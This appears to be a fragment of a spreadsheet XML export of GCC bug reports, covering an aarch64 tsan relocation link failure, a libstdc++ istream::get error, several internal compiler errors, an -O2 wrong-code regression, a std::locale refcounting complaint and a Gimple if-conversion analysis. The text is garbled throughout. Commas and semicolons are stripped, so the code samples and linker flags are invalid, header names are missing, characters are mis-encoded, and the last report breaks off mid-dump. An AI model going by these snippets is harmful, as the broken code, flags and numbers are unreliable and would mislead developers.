.libs/tsan_rtl_aarch64.o: In function `_setjmp':
/tmp/tmp.d1V9p3OGZO.cbatch02777/build-aarch64-sarc-linux-gnu/aarch64-sarc-linux-gnu/libsanitizer/tsan/../../../../libsanitizer/tsan/tsan_rtl_aarch64.S:128:(.text+0x94): relocation truncated to fit: R_AARCH64_LDST64_ABS_LO12_NC against `.text'
.libs/tsan_rtl_aarch64.o: In function `sigsetjmp':
/tmp/tmp.d1V9p3OGZO.cbatch02777/build-aarch64-sarc-linux-gnu/aarch64-sarc-linux-gnu/libsanitizer/tsan/../../../../libsanitizer/tsan/tsan_rtl_aarch64.S:177:(.text+0xd8): relocation truncated to fit: R_AARCH64_LDST64_ABS_LO12_NC against `.text'
.libs/tsan_rtl_aarch64.o: In function `__sigsetjmp':
/tmp/tmp.d1V9p3OGZO.cbatch02777/build-aarch64-sarc-linux-gnu/aarch64-sarc-linux-gnu/libsanitizer/tsan/../../../../libsanitizer/tsan/tsan_rtl_aarch64.S:228:(.text+0x120): relocation truncated to fit: R_AARCH64_LDST64_ABS_LO12_NC against `.text'
collect2: error: ld returned 1 exit status
And the command executed is the following:
libtool: link:  /tmp/tmp.d1V9p3OGZO.cbatch02777/build-aarch64-sarc-linux-gnu/./gcc/xgcc -shared-libgcc -B/tmp/tmp.d1V9p3OGZO.cbatch02777/build-aarch64-sarc-linux-gnu/./gcc -nostdinc++ -L/tmp/tmp.d1V9p3OGZO.cbatch02777/build-aarch64-sarc-linux-gnu/aarch64-sarc-linux-gnu/libstdc++-v3/src -L/tmp/tmp.d1V9p3OGZO.cbatch02777/build-aarch64-sarc-linux-gnu/aarch64-sarc-linux-gnu/libstdc++-v3/src/.libs -L/tmp/tmp.d1V9p3OGZO.cbatch02777/build-aarch64-sarc-linux-gnu/aarch64-sarc-linux-gnu/libstdc++-v3/libsupc++/.libs -B/sarc-c/compiler_tmp/tools/cross/aarch64-sarc-linux-gnu/gcc-7.0/2017-01-18-18-37-57-fe8aea6-master/aarch64-sarc-linux-gnu/bin/ -B/sarc-c/compiler_tmp/tools/cross/aarch64-sarc-linux-gnu/gcc-7.0/2017-01-18-18-37-57-fe8aea6-master/aarch64-sarc-linux-gnu/lib/ -isystem /sarc-c/compiler_tmp/tools/cross/aarch64-sarc-linux-gnu/gcc-7.0/2017-01-18-18-37-57-fe8aea6-master/aarch64-sarc-linux-gnu/include -isystem /sarc-c/compiler_tmp/tools/cross/aarch64-sarc-linux-gnu/gcc-7.0/2017-01-18-18-37-57-fe8aea6-master/aarch64-sarc-linux-gnu/sys-include     -fPIC -DPIC -shared -nostdlib /sarc-c/compiler_tmp/tools/cross/aarch64-sarc-linux-gnu/gcc-7.0/2017-01-18-18-37-57-fe8aea6-master/aarch64-sarc-linux-gnu/sysroot/usr/lib/../lib64/crti.o /tmp/tmp.d1V9p3OGZO.cbatch02777/build-aarch64-sarc-linux-gnu/./gcc/crtbeginS.o  .libs/tsan_clock.o .libs/tsan_debugging.o .libs/tsan_fd.o .libs/tsan_flags.o .libs/tsan_ignoreset.o .libs/tsan_interceptors.o .libs/tsan_interceptors_mac.o .libs/tsan_interface_ann.o .libs/tsan_interface_atomic.o .libs/tsan_interface.o .libs/tsan_interface_java.o .libs/tsan_libdispatch_mac.o .libs/tsan_malloc_mac.o .libs/tsan_md5.o .libs/tsan_mman.o .libs/tsan_mutex.o .libs/tsan_mutexset.o .libs/tsan_new_delete.o .libs/tsan_platform_linux.o .libs/tsan_platform_mac.o .libs/tsan_platform_posix.o .libs/tsan_platform_windows.o .libs/tsan_report.o .libs/tsan_rtl.o .libs/tsan_rtl_mutex.o .libs/tsan_rtl_proc.o .libs/tsan_rtl_report.o .libs/tsan_rtl_thread.o .libs/tsan_stack_trace.o .libs/tsan_stat.o .libs/tsan_suppressions.o .libs/tsan_symbolize.o .libs/tsan_sync.o .libs/tsan_rtl_aarch64.o  -Wl--whole-archive ../sanitizer_common/.libs/libsanitizer_common.a ../interception/.libs/libinterception.a ../libbacktrace/.libs/libsanitizer_libbacktrace.a -Wl--no-whole-archive  -Wl-rpath -Wl/tmp/tmp.d1V9p3OGZO.cbatch02777/build-aarch64-sarc-linux-gnu/aarch64-sarc-linux-gnu/libstdc++-v3/src/.libs -Wl-rpath -Wl/sarc-c/compiler_tmp/tools/cross/aarch64-sarc-linux-gnu/gcc-7.0/2017-01-18-18-37-57-fe8aea6-master/aarch64-sarc-linux-gnu/lib/../lib64 -L/tmp/tmp.d1V9p3OGZO.cbatch02777/build-aarch64-sarc-linux-gnu/aarch64-sarc-linux-gnu/libstdc++-v3/src/.libs -L/tmp/tmp.d1V9p3OGZO.cbatch02777/build-aarch64-sarc-linux-gnu/aarch64-sarc-linux-gnu/libstdc++-v3/src -L/tmp/tmp.d1V9p3OGZO.cbatch02777/build-aarch64-sarc-linux-gnu/aarch64-sarc-linux-gnu/libstdc++-v3/libsupc++/.libs -ldl -lrt -lpthread ../../libstdc++-v3/src/.libs/libstdc++.so -lm -L/tmp/tmp.d1V9p3OGZO.cbatch02777/build-aarch64-sarc-linux-gnu/./gcc -L/sarc-c/compiler_tmp/tools/cross/aarch64-sarc-linux-gnu/gcc-7.0/2017-01-18-18-37-57-fe8aea6-master/aarch64-sarc-linux-gnu/bin -L/sarc-c/compiler_tmp/tools/cross/aarch64-sarc-linux-gnu/gcc-7.0/2017-01-18-18-37-57-fe8aea6-master/aarch64-sarc-linux-gnu/lib -L/sarc-c/compiler_tmp/tools/cross/aarch64-sarc-linux-gnu/gcc-7.0/2017-01-18-18-37-57-fe8aea6-master/aarch64-sarc-linux-gnu/sysroot/lib/../lib64 -L/sarc-c/compiler_tmp/tools/cross/aarch64-sarc-linux-gnu/gcc-7.0/2017-01-18-18-37-57-fe8aea6-master/aarch64-sarc-linux-gnu/sysroot/usr/lib/../lib64 -L/sarc-c/compiler_tmp/tools/cross/aarch64-sarc-linux-gnu/gcc-7.0/2017-01-18-18-37-57-fe8aea6-master/aarch64-sarc-linux-gnu/sysroot/lib -L/sarc-c/compiler_tmp/tools/cross/aarch64-sarc-linux-gnu/gcc-7.0/2017-01-18-18-37-57-fe8aea6-master/aarch64-sarc-linux-gnu/sysroot/usr/lib -lc -lgcc_s /tmp/tmp.d1V9p3OGZO.cbatch02777/build-aarch64-sarc-linux-gnu/./gcc/crtendS.o /sarc-c/compiler_tmp/tools/cross/aarch64-sarc-linux-gnu/gcc-7.0/2017-01-18-18-37-57-fe8aea6-master/aarch64-sarc-linux-gnu/sysroot/usr/lib/../lib64/crtn.o    -Wl-soname -Wllibtsan.so.0 -o .libs/libtsan.so.0.0.0
Our latest failed attempt was was SHA 209c42f from Jan 18. Our last good sha was 71d20f3. I have not had a chance to fully bisect down between those two to determine exactly which commit is causing the failure.</t>
  </si>
  <si>
    <t>brzycki</t>
  </si>
  <si>
    <t>GCC-6915</t>
  </si>
  <si>
    <t>istream::get calls won't compile when getting an unsigned char</t>
  </si>
  <si>
    <t xml:space="preserve">g++ gives the following error when trying to compile the code given below:
foo.cc: In member function `bool Oct::input(std::istream&amp;)':
foo.cc:14: no matching function for call to `std::basic_istream&lt;char 
   std::char_traits &gt;::get(unsigned char&amp;)'
/usr/local/include/g++-v3/bits/istream.tcc:513: candidates are: 
   _Traits::int_type std::basic_istream::get() [with _CharT = 
   char _Traits = std::char_traits]
/usr/local/include/g++-v3/bits/istream.tcc:545:                 
   std::basic_istream&amp; std::basic_istream&lt;_CharT 
   _Traits&gt;::get(_CharT&amp;) [with _CharT = char _Traits = 
   std::char_traits]
/usr/local/include/g++-v3/bits/istream.tcc:579:                 
   std::basic_istream&amp; std::basic_istream&lt;_CharT 
   _Traits&gt;::get(_CharT* int _CharT) [with _CharT = char _Traits = 
   std::char_traits]
/usr/local/include/g++-v3/istream:162:                 
   std::basic_istream&amp; std::basic_istream&lt;_CharT 
   _Traits&gt;::get(_CharT* int) [with _CharT = char _Traits = 
   std::char_traits]
/usr/local/include/g++-v3/bits/istream.tcc:619:                 
   std::basic_istream&amp; std::basic_istream&lt;_CharT 
   _Traits&gt;::get(std::basic_streambuf&amp; _CharT) [with _CharT = 
   char _Traits = std::char_traits]
/usr/local/include/g++-v3/istream:169:                 
   std::basic_istream&amp; std::basic_istream&lt;_CharT 
   _Traits&gt;::get(std::basic_streambuf&amp;) [with _CharT = char 
   _Traits = std::char_traits]
Release:
3.1
Environment:
System: Linux 2.4.18-lkpc-4 #2 Tue Mar 19 16:31:43 CET 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /usr/local/src/gcc-3.1/configure --prefix=/usr/local --enable-languages=cc++
How-To-Repeat:
This small source file will trigger the problem.
#include 
using std::istream
class Oct {
  public:
    bool input(istream 
  private:
    unsigned char value
}
bool
Oct::input(istream &amp;in)
{
  in.get(value)
  return (in.bad() | in.eof())
}
int main()
{
  Oct a
}  
Here is uuencoded foo.tar.gz which is the foo.ii file generated from
--save-temps
See attachments for foo.tar.gz
</t>
  </si>
  <si>
    <t>collar</t>
  </si>
  <si>
    <t>GCC-5281</t>
  </si>
  <si>
    <t>some syntax is no longer accepted by g++ 3.0.3</t>
  </si>
  <si>
    <t>The follwing statement is no longer accepted by the new
g++ 3.0.3:
the OIOnihout is a class.
friend OIOnihout
is not accepted by new g++ 3.0.3 and have to say:
friend class OIOnihout
Do you have any option to make it work on g++ 3.0.3?
Thanks!
Release:
g++ 3.0.3
Environment:
gcc/g++ 3.0.3</t>
  </si>
  <si>
    <t>GCC-36742</t>
  </si>
  <si>
    <t>[4.2 Regression] g++ -O2 produces wrong code</t>
  </si>
  <si>
    <t>The following code produces correct output with g++ -O but wrong output with g++ -O2:
The basic calculation should be just a product of two complex numbers each equal to (11) so the output should be (and is with g++ -O):
a = (02)
However on my system the output with the -O2 flag is:
a = (-1.22015e-3131.22015e-313)
Furthermore any one of the following changes fixes the problem:
Any one of the following changes fix the problem:
- Removing either Assert statement in foo
- Removing the imag(b.val) branch in foo
- Removing the trigraph in foo
- Removing s2 from Error
- Removing base class of A
- Removing junk from A
Here is the code:
#include 
#include 
#include 
class B
{
  public:
    virtual size_t one() const = 0
    virtual ~B() {}
}
class A : public B
{
  public:
    A(std::complex _val) : itsval(_val) junk(1) {}
    ~A() {}
    std::complex }
    size_t one() const { return 1 }
  protected :
    std::complex itsval
    const size_t junk
}
class Error
{
  public :
    std::string s1 s2
    inline Error(std::string _s1 std::string _s2=) throw() :
      s1(_s1) s2(_s2) {}
    virtual inline ~Error() throw() {}
}
#define Assert(x) do { if(!(x)) { throw Error(#x) } } while(false)
void foo(A&amp; a std::complex b)
{
  Assert(a.one() == 1)
  Assert(a.one() == 1)
  if (std::imag(b) == double(0))
    a.val() *= std::real(b)
  else
    a.val() *= (true ? b : std::conj(b))
}
int main()
{
  A a(std::complex(11))
  std::complex b(11)
  foo(a b)
  std::cout&lt;&lt;a = &lt;&lt;a.val()&lt;&lt;std::endl
  //std::cout&lt;&lt;Should be (02)\n
  return 0
}</t>
  </si>
  <si>
    <t>GCC-59439</t>
  </si>
  <si>
    <t>std::locale uses atomic instructions on construction</t>
  </si>
  <si>
    <t>In a large multithreaded program that uses stringstream to stringify integers I have seen that construction and deconstruction of std::locale can take over 10% of the runtime according to the perf tool.
In bug 40088 std::locale was optimized to avoid the usage of a mutex when creating the default locale. In our program this path is being exercised. However the act of doing ref counting still has a very large performance penalty on SMP systems due to cache line bouncing.
If this locale is truly readonly it would be much better if refcounting could be avoided. Maybe a refcount of -1 could signify this object need not be refcounted.</t>
  </si>
  <si>
    <t>ben.maurer</t>
  </si>
  <si>
    <t>GCC-37381</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE in ia64_speculate_insn at config/ia64/ia64.c:6902</t>
  </si>
  <si>
    <t>I get the following ICE with trunk from 20080903 (revision 127646).  This doesn't happen with 4.4.0 20080802
(sid)tbm@coconut0:~$ /usr/lib/gcc-snapshot/bin/gcc -O2 -c wmtv-wmtv.c
wmtv-wmtv.c: In function 'DoFullScreen':
wmtv-wmtv.c:97: internal compiler error: in ia64_speculate_insn at config/ia64/ia64.c:6902
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
(sid)tbm@coconut0:~$ /usr/lib/gcc-snapshot/bin/gcc -O -c wmtv-wmtv.c
(sid)tbm@coconut0:~$</t>
  </si>
  <si>
    <t>GCC-27282</t>
  </si>
  <si>
    <t>[4.2 regression] ICE in final_scan_insn at final.c:2448 - could not split insn</t>
  </si>
  <si>
    <t>I get the following on powerpc don't see it on i386 or x86_64:
766:tbm@test: ~/delta/bin] /usr/lib/gcc-snapshot/bin/gcc -c -O mini.c
mini.c: In function 'colrow_equal':
mini.c:17: error: could not split insn
(insn 59 28 29 (set (reg:SI 9 9)
        (const_int 3791650816 [0xe2000000])) 262 {*movsi_internal1} (nil)
    (nil))
mini.c:17: internal compiler error: in final_scan_insn at final.c:2448
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
zsh: exit 1     /usr/lib/gcc-snapshot/bin/gcc -c -O mini.c
767:tbm@test: ~/delta/bin] /usr/lib/gcc-snapshot/bin/gcc -c mini.c
768:tbm@test: ~/delta/bin] gcc-4.1 -c -O2 mini.c
769:tbm@test: ~/delta/bin]</t>
  </si>
  <si>
    <t>GCC-27478</t>
  </si>
  <si>
    <t>[4.2 Regression] entry and addressable and value-expr: and the gimplifier</t>
  </si>
  <si>
    <t>#!/bin/sh
cat &gt;bug.f &lt;&lt;\EOF
      FUNCTION TSL(PIN)
!      EXTERNAL PPP
      ENTRY TSL1(PIN)
      IF (DBLE(TSL) .GT. PIN) TSL = 705.47
      TSL= PPP(TSL)
      END
EOF
(
exec 2&gt;&amp;1
uname -a
set -x
gfortran --version 
gfortran -v -c -save-temps bug.f
ls -ltrasd bug*
echo =========================================
cat bug.i*
echo =========================================
#cat bug.s
echo =========================================
) | tee -a $0
exit
########################################################################
CYGWIN_NT-5.1 electra 1.5.12(0.116/4/2) 2004-11-10 08:34 i686 unknown unknown Cygwin
+ gfortran --version
GNU Fortran 95 (GCC) 4.2.0 20060420 (experimental)
Copyright (C) 2006 Free Software Foundation Inc.
GNU Fortran comes with NO WARRANTY to the extent permitted by law.
You may redistribute copies of GNU Fortran
under the terms of the GNU General Public License.
For more information about these matters see the file named COPYING
+ gfortran -v -c -save-temps bug.f
Using built-in specs.
Target: i686-pc-cygwin
Configured with: ../trunk/configure --prefix=/irun --with-
mpfr=/usr/local/gmp --with-gmp=/usr/local/gmp --enable-
languages=cfortran --disable-bootstrap : (reconfigured)
../trunk/configure --prefix=/irun --with-mpfr=/usr/local/gmp --with-
gmp=/usr/local/gmp --enable-languages=cfortran --disable-bootstrap :
(reconfigured) ../trunk/configure --prefix=/irun --with-
mpfr=/usr/local/gmp --with-gmp=/usr/local/gmp --disable-bootstrap
--enable-languages=cfortran --no-create --no-recursion : (reconfigured)
../trunk/configure --prefix=/irun --with-mpfr=/usr/local/gmp --with-
gmp=/usr/local/gmp --disable-bootstrap --enable-languages=cfortran
--no-create --no-recursion : (reconfigured) ../trunk/configure
--prefix=/irun --with-mpfr=/usr/local/gmp --with-gmp=/usr/local/gmp
--disable-bootstrap --enable-languages=cfortran --no-create --no-
recursion : (reconfigured) ../trunk/configure --prefix=/irun --with-
mpfr=/usr/local/gmp --with-gmp=/usr/local/gmp --disable-bootstrap
--enable-languages=cfortran --no-create --no-recursion : (reconfigured)
../trunk/configure --prefix=/irun --with-mpfr=/usr/local/gmp --with-
gmp=/usr/local/gmp --disable-bootstrap --enable-languages=cfortran
--no-create --no-recursion : (reconfigured) ../trunk/configure
--prefix=/irun --with-mpfr=/usr/local/gmp --with-gmp=/usr/local/gmp
--disable-bootstrap --enable-languages=cfortran --no-create --no-
recursion : (reconfigured) ../trunk/configure --prefix=/irun --with-
mpfr=/usr/local/gmp --with-gmp=/usr/local/gmp --disable-bootstrap
--enable-languages=cfortran : (reconfigured) ../trunk/configure
--prefix=/irun --with-mpfr=/usr/local/gmp --with-gmp=/usr/local/gmp
--disable-bootstrap --enable-languages=cfortran --no-create --no-
recursion : (reconfigured) ../trunk/configure --prefix=/irun --with-
mpfr=/usr/local/gmp --with-gmp=/usr/local/gmp --disable-bootstrap
--enable-languages=cfortran --enable-languages=cfortran --no-create
--no-recursion : (reconfigured) ../trunk/configure --prefix=/irun
--with-mpfr=/usr/local/gmp --with-gmp=/usr/local/gmp --disable-bootstrap
--enable-languages=cfortran --enable-languages=cfortran --no-create
--no-recursion : (reconfigured) ../trunk/configure --prefix=/irun
--with-mpfr=/usr/local/gmp --with-gmp=/usr/local/gmp --disable-bootstrap
--enable-languages=cfortran --enable-languages=cfortran --no-create
--no-recursion : (reconfigured) ../trunk/configure --prefix=/irun
--with-mpfr=/usr/local/gmp --with-gmp=/usr/local/gmp --disable-bootstrap
--enable-languages=cfortran --enable-languages=cfortran --no-create
--no-recursion
Thread model: single
gcc version 4.2.0 20060420 (experimental)
 /usr/local/irun/bin/../libexec/gcc/i686-pc-cygwin/4.2.0/f951.exe bug.f -ffixed-form -quiet -dumpbase bug.f -mtune=generic -auxbase bug -version -I /usr/local/irun/bin/../lib/gcc/i686-pc-cygwin/4.2.0/finclude -o bug.s
GNU F95 version 4.2.0 20060420 (experimental) (i686-pc-cygwin)
        compiled by GNU C version 3.2 20020927 (prerelease).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
bug.f: In function 'master.0.tsl':
bug.f:5: error: invalid operand to binary operator
__result_master.0.tslD.917
bug.f:5: internal compiler error: verify_stmts failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
+ ls -ltrasd bug.f bug.ksh bug.o bug.s bug1
1 -rw-r--r--  1 urbanjs None 672 Dec 13 23:34 bug.ksh
1 -rw-r--r--  1 urbanjs None 812 Feb 12 23:32 bug1
1 -rw-r--r--  1 urbanjs None 537 May  8 00:44 bug.o
1 -rw-r--r--  1 urbanjs None 139 May  8 00:52 bug.f
1 -rw-r--r--  1 urbanjs None 557 May  8 00:52 bug.s
+ echo =========================================
=========================================
+ cat bug.i*
cat: bug.i*: No such file or directory
+ echo =========================================
=========================================
+ echo =========================================
=========================================
urbanjs@electra ~
$</t>
  </si>
  <si>
    <t>johnurban</t>
  </si>
  <si>
    <t>GCC-59399</t>
  </si>
  <si>
    <t>ICE in expand_expr_real_1 with -m64 -fsanitize=signed-integer-overflow</t>
  </si>
  <si>
    <t>On powerpc64-linux I'm seeing a failure in the ubsan testsuite that causes an ICE in expand_real_1 line 9484.  A simplified test case is:
[bergner@igoo BUGS]$ cat bug.ii 
void
foo (int i int j)
{
  volatile int k = j + i
}
[bergner@igoo BUGS]$ /home/bergner/gcc/build/gcc-fsf-mainline-debug/gcc/cc1plus -fpreprocessed -quiet -m64 -fsanitize=signed-integer-overflow bug.ii 
bug.ii: In function â€˜void foo(int int)â€™:
bug.ii:4:22: internal compiler error: in expand_expr_real_1 at expr.c:9484
   volatile int k = j + i
                      ^
0x107c1d2f expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def**)
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/expr.c:9484
0x107b9d57 expand_expr_real(tree_node* rtx_def* machine_mode expand_modifier rtx_def**)
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/expr.c:7927
0x109590af expand_expr
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/expr.h:453
0x1095a383 ubsan_expand_si_overflow_addsub_check(tree_code gimple_statement_base*)
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/internal-fn.c:182
0x1095b30f expand_UBSAN_CHECK_ADD
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/internal-fn.c:436
0x1095b467 expand_internal_call(gimple_statement_base*)
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/internal-fn.c:476
0x106071ab expand_call_stmt
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/cfgexpand.c:2185
0x1060b9d3 expand_gimple_stmt_1
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/cfgexpand.c:3154
0x1060c20f expand_gimple_stmt
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/cfgexpand.c:3306
0x106149eb expand_gimple_basic_block
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/cfgexpand.c:5146
0x106170db gimple_expand_cfg
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/cfgexpand.c:5712
0x10617aff execute
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/cfgexpand.c:5932
We're dying in the gcc_assert below:
          /* Get the signedness to be used for this variable.  Ensure we get
             the same mode we got when the variable was declared.  */
          if (code == SSA_NAME
              &amp;&amp; (g = SSA_NAME_DEF_STMT (ssa_name))
              &amp;&amp; gimple_code (g) == GIMPLE_CALL)
            {
              gcc_assert (!gimple_call_internal_p (g))
              pmode = promote_function_mode (type mode &amp;unsignedp
                                             gimple_call_fntype (g)
                                             2)
            }
The debugger shows g to be:
(gdb) p *g
$1 = {code = GIMPLE_CALL no_warning = 0 visited = 0 nontemporal_move = 0 plf = 0 modified = 0 
  has_volatile_ops = 0 subcode = 64 uid = 0 location = 2147483648 num_ops = 5 bb = 0xfffb0070208 
  next = 0xfffb00a00a0 prev = 0xfffb00a00a0}</t>
  </si>
  <si>
    <t>GCC-39196</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE in copyprop_hardreg_forward_1 at regrename.c:1603 during libjava compile</t>
  </si>
  <si>
    <t>This appeared during compile of the last weekly 4.4.0 snapshot in libjava compilation:
libtool: compile:  /var/tmp/portage/sys-devel/gcc-4.4.0_alpha20090215/work/build/./gcc/xgcc -B/var/tmp/portage/sys-devel/gcc-4.4.0_alpha20090215/work/build/./gcc/ -B/usr/x86_64-pc-linux-gnu/bin/ -B/usr/x86_64-pc-linux-gnu/lib/ -isystem /usr/x86_64-pc-linux-gnu/include -isystem /usr/x86_64-pc-linux-gnu/sys-include -DHAVE_CONFIG_H -I. -I/var/tmp/portage/sys-devel/gcc-4.4.0_alpha20090215/work/gcc-4.4-20090215/libjava/classpath/native/fdlibm -I../../include -fexceptions -fasynchronous-unwind-tables -g -O2 -march=nocona -pipe -MT dtoa.lo -MD -MP -MF .deps/dtoa.Tpo -c /var/tmp/portage/sys-devel/gcc-4.4.0_alpha20090215/work/gcc-4.4-20090215/libjava/classpath/native/fdlibm/dtoa.c  -fPIC -DPIC -o .libs/dtoa.o
/var/tmp/portage/sys-devel/gcc-4.4.0_alpha20090215/work/gcc-4.4-20090215/libjava/classpath/native/fdlibm/dtoa.c: In function â€˜_Jv_dtoa_râ€™:
/var/tmp/portage/sys-devel/gcc-4.4.0_alpha20090215/work/gcc-4.4-20090215/libjava/classpath/native/fdlibm/dtoa.c:885: error: insn does not satisfy its constraints:
(insn 2428 2427 687 103 /var/tmp/portage/sys-devel/gcc-4.4.0_alpha20090215/work/gcc-4.4-20090215/libjava/classpath/native/fdlibm/dtoa.c:536 (set (reg:DF 26 xmm5 [orig:233 D.3242 ] [233])
        (mult:DF (reg:DF 26 xmm5 [orig:233 D.3242 ] [233])
            (reg:DF 0 ax))) 722 {*fop_df_comm_sse} (nil))
/var/tmp/portage/sys-devel/gcc-4.4.0_alpha20090215/work/gcc-4.4-20090215/libjava/classpath/native/fdlibm/dtoa.c:885: internal compiler error: in copyprop_hardreg_forward_1 at regrename.c:1603
Please submit a full bug report
with preprocessed source if appropriate.
Reproducible on the preprocessed source using:
/var/tmp/portage/sys-devel/gcc-4.4.0_alpha20090215/work/build/./gcc/xgcc -B/var/tmp/portage/sys-devel/gcc-4.4.0_alpha20090215/work/build/./gcc/ -o dtoa.o dtoa.i -O2 -march=nocona</t>
  </si>
  <si>
    <t>GCC-13493</t>
  </si>
  <si>
    <t>extra '' generated in object file.</t>
  </si>
  <si>
    <t>a '' is generated in the output file of gcc whereas it isn't present in
the class file. In that case it should not be enumerated as a declared method:
this can cause major troubles in the serialization logic of libjava which then
fails to produce a valid serialVersionUID. This seems to happen only in the
typical case of the following example:
public class C
{
        static class D extends C
        {
          private static final String s = hello
        }
}
If you try to compile this example it will generate a static '' method
in the inner class D which should not happen as the class file doesn't have it.</t>
  </si>
  <si>
    <t>GCC-50754</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE in expand_debug_expr at cfgexpand.c:3341</t>
  </si>
  <si>
    <t>somewhere in the last 3 days the following regression appeared in trunk:
gfortran -march=core2 -mcx16 -msahf -mno-movbe -mno-aes -mno-pclmul -mno-popcnt -mno-abm -mno-lwp -mno-fma -mno-fma4 -mno-xop -mno-bmi -mno-bmi2 -mno-tbm -mno-avx -mno-avx2 -mno-sse4.2 -mno-sse4.1 -mno-lzcnt --param l1-cache-size=32 --param l1-cache-line-size=64 --param l2-cache-size=4096 -mtune=core2 -g -O3 -ffast-math -funroll-loops -ftree-vectorize -ffree-form  bug.f90
 &lt;vec_perm_expr 0x7fcf671e41f8
    type &lt;vector_type 0x7fcf67110540
        type &lt;real_type 0x7fcf670aef18 real(kind=8) DF
            size 
            unit size 
            align 64 symtab 0 alias set 2 canonical type 0x7fcf670aef18 precision 64
            pointer_to_this &gt;
        V2DF
        size 
        unit size 
        align 128 symtab 0 alias set 2 canonical type 0x7fcf67110540 nunits 2
        pointer_to_this &gt;
    arg 0 
        visited var def_stmt vect_var_.27_126 = MEM[(real(kind=8)[3] *)
        version 126&gt; arg 1 
    arg 2 &lt;vector_cst 0x7fcf671cc5a0
        type 
            unsigned V2DI size  unit size 
            align 128 symtab 0 alias set -1 canonical type 0x7fcf671c1c78 nunits 2&gt;
        constant
        elt0:  
        elt1:  &gt;
    bug.f90:9:0&gt;
bug.f90: In function â€˜calcboxâ€™:
bug.f90:4:0: internal compiler error: in expand_debug_expr at cfgexpand.c:3341
&gt; cat bug.f90
MODULE gauss_colloc
  INTEGER PARAMETER :: dp=8
CONTAINS
FUNCTION calcBox() RESULT(res)
    REAL(dp) :: cci0 cci1 cci2 delta_i m(0:20:2) maxr2 r_0 sqDi
    REAL(dp) DIMENSION(0:2)    :: l resPos
    r_0=0.0_dp
    DO i=02
        r_0=r_0-0.5*resPos(2-i)*l(i)
    END DO
    cci0 = -((-4.0_dp * m(22) * r_0 * m(11) + &amp;
        m(22) * l(1) ** 2 + l(2) ** 2 * m(11) &amp;
        - 2.0_dp * l(1) * m(12) * l(2) + 4.0_dp * r_0 * m(12) ** 2) &amp;
        / (m(22) * m(11) - m(12) ** 2)) / 4.0_dp-maxr2
    delta_i=cci1*cci1-4.0_dp*cci2*cci0
    IF (delta_i&lt;0.0_dp) THEN
        imin=fullShift(2)+CEILING((-cci1-sqDi)/(2.0_dp*cci2))
    END IF
END FUNCTION
END MODULE</t>
  </si>
  <si>
    <t>GCC-46350</t>
  </si>
  <si>
    <t>s-taprop.adb:891:40: warning: redundant conversion expression is of type Interrupt_ID</t>
  </si>
  <si>
    <t>/xxx/gnu/gcc/objdir/./gcc/xgcc -B/xxx/gnu/gcc/objdir/./gcc/ -B/opt/gnu/gcc/gcc-4.6/hppa1.1-hp-hpux10.20/bin/ -B/opt/gnu/gcc/gcc-4.6/hppa1.1-hp-hpux10.20/lib/ -isystem /opt/gnu/gcc/gcc-4.6/hppa1.1-hp-hpux10.20/include -isystem /opt/gnu/gcc/gcc-4.6/hppa1.1-hp-hpux10.20/sys-include    -c -g -O2   -W -Wall -gnatpg   s-taprop.adb -o s-taprop.o
s-taprop.adb:891:40: warning: redundant conversion expression is of type Interrupt_ID
make[5]: *** [s-taprop.o] Error 1
make[5]: Leaving directory `/xxx/gnu/gcc/objdir/gcc/ada/rts'
make[4]: *** [gnatlib] Error 2
make[4]: Leaving directory `/xxx/gnu/gcc/objdir/gcc/ada'
make[3]: *** [gnatlib-shared] Error 2
make[3]: Leaving directory `/xxx/gnu/gcc/objdir/gcc/ada'
make[2]: *** [gnatlib-shared] Error 2
make[2]: Leaving directory `/xxx/gnu/gcc/objdir/hppa1.1-hp-hpux10.20/libada'
make[1]: *** [all-target-libada] Error 2
make[1]: Leaving directory `/xxx/gnu/gcc/objdir'</t>
  </si>
  <si>
    <t>GCC-77848</t>
  </si>
  <si>
    <t>Gimple if-conversion results in redundant comparisons</t>
  </si>
  <si>
    <t>Gimple if-conversion is aggressive about converting PHIs to conditional expressions.  When these expressions are not vectorized they remain in conditional form throughout the middle end phases.  Sometimes such conditionals do not correspond to any target instructions so they must be re-expanded to branching logic.  When this happens and several conditionals have the same condition GCC doesn't manage to combine the redundant conditions (at least not always).
I suspect that if such unusable conditionals were converted back to branching logic after failed vectorization jump threading would be able to pick up the pieces and generate good code again but I'm not certain.
As an example on powerpc64le-linux consider this Fortran code:
$ gfortran -S -O3 -mcpu=power8 -mtune=power8 -funroll-loops -ffast-math -mrecip=all d138.f
      subroutine sub(xanm)
      implicit none
      real*8 x(*)a(*)atemp
      integer ijkmn
      real*8 stuv
      do j=1m
         atemp=0.d0
         do i=1n
            if (abs(a(i)).gt.atemp) then
               atemp=a(i)
               k = i
            end if
         enddo
         call dummy(atempk)
      enddo
      return
      end
Prior to if-conversion we have:
  :
  # i_29 = PHI 
  # atemp_lsm.3_7 = PHI 
  # atemp_lsm.4_6 = PHI 
  # k_lsm.5_27 = PHI 
  _1 = (integer(kind=8)) i_29
  _2 = _1 + -1
  _3 = *a_17(D)[_2]
  _4 = ABS_EXPR 
  if (_4 &gt; atemp_lsm.3_7)
    goto 
  else
    goto 
  :
  :
  # atemp_lsm.3_9 = PHI 
  # atemp_lsm.4_28 = PHI 
  # k_lsm.5_26 = PHI 
  i_20 = i_29 + 1
  if (_16 &lt; i_20)
    goto 
  else
    goto 
Following if-conversion the PHIs in  have been converted into conditional expressions in :
  :
  # i_29 = PHI 
